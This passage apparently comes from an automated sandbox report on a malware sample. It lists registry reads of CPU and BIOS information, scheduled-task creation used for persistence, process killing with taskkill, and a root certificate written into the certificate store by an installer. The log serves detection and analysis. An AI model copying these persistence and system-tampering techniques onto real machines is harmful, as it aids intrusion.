description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3588 schtasks.exe 5448 schtasks.exe 5676 schtasks.exe 7108 schtasks.exe 5928 schtasks.exe 2260 schtasks.exe -
Enumerates system info in registry 2 TTPs 64 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WinHoster.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 6 IoCs
pid Process 3120 taskkill.exe 904 taskkill.exe 2512 taskkill.exe 4384 taskkill.exe 3820 taskkill.exe 8416 taskkill.exe -
description ioc Process Key created \Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cscript.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe -
Modifies registry class 15 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{114E2DF9-DC35-4A35-92AB-FC22F83BC0B9} msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{344209CF-1BA1-49BC-955D-37F48620573E} Settings.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{51ECB82F-DF38-4705-A21E-98441ACF4E2C} Calculator.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" msedge.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 190000000100000010000000ea6089055218053dd01e37e1d806eedf0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) 